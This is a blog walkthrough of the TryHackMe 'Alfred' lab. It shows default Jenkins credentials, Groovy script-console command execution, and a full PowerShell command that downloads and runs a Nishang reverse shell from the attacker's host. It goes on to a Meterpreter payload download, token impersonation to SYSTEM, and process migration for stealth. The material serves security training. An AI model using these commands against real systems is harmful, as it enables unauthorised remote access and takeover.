CTF Walkthroughs, TryHackMe

TryHackMe – Alfred Walkthrough

February 6, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows box that involved authenticating to Jenkins using common credentials, executing commands through the Groovy scripting language used in the script console to gain remote access and using token impersonation to escalate privileges to SYSTEM.

It also involved switching from a normal shell to a Meterpreter shell and migrating from a user level process to a SYSTEM level process.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

Port 8080 takes to a web server hosting the Jekins web application:

Exploiting Jenkins on Port 8080

After trying to authenticate into Jenkins with some very common credentials, the admin/admin combination appeared to work:

Jenkins comes with a “Script Console” administrative tool, which allows authenticated users to run scripts using Apache Groovy, a Java-syntax-compatible object-oriented programming language for the Java platform.

After doing some research it looks like the execute() function can be used to perform shell commands:

Navigating to the “Manage Jenkins page:

Selecting the script console option from the administrative tools:

Testing remote command execution through the execute function, using “print” to display the output of the command:

print "whoami".execute().text

The command seems to have worked, as the name of the domain and current user is printed in the result section of the page.

From RCE to Reverse Shell

One of the easiest ways to obtain a reverse shell on Windows is through the Nishang Powershell TCP Reverse Shell. Copying it to the working directory:

Setting up a Python web server to host it so that it can be downloaded:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Executing the Powershell reverse shell remotely providing the mode (reverse), the local IP address (10.9.228.20) and the local port(443):

print "powershell IEX(New-Object Net.WebClient).downloadString('http://10.9.228.20/Invoke-PowershellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.228.20 -Port 443".execute().text

A callback was received granting a reverse shell to the target machine:

Switching Shells

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case the Windows Meterpreter reverse shell
  • -a to specify the architecture, in this case x86 bit
  • –encoder to specify the encoder, in this case shikata_ga_nai
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell file, in this case exe

Setting up a Python web server to host the reverse shell

Downloading the shell using Powershell:

powershell "(New-Object Net.WebClient).Downloadfile('http://10.9.228.20/shell.exe','shell.exe')"

Starting Metasploit, selecting the multi handler module, setting the payload type, LHOST and LPORT options to match the shell, running the listener:

Executing the reverse shell using the Powershell “Start-Process” cmdlet:

As expected, a Meterpreter reverse shell was has been obtained.

Privilege Escalation

Upon checking privileges with the “whoami /priv” command, it appears the current user has the SeImpersonate privilege:

This privilege can be exploited through Token Impersonation to escalate to SYSTEM using tools such as Juicy Potato, although Metasploit has a handy module that can be used to exploit it.

Loading the “Incognito” extension, which allows to impersonate tokens:

Using the “list_tokens -g” command to list the available tokens:

Using the “impersonate_token” command to steal the Administrator’s token:

This has granted SYSTEM level privileges to the system.

Migrating to a SYSTEM Level Process

Using the “ps” command to view the current processes, it appears that “services.exe” (PID 668) is running with SYSTEM level privileges:

Using the “migrate” command to migrate to the “services.exe” process:

Migrating processes can not only be useful to elevate privileges, but also to conduct further enumeration while undetected, by camouflaging as a superficially unsuspected and harmless process.

Conclusion

This was a really interesting machine, the Jenkins exploitation was something that is present in other CTF challenges online although it’s always good to practice it as it is a quite common web application.

The privilege escalation part was entirely done using Meterpreter, which isn’t indispensable to perform Token Impersonation but it’s probably a more common way to exploit it in a real world scenario.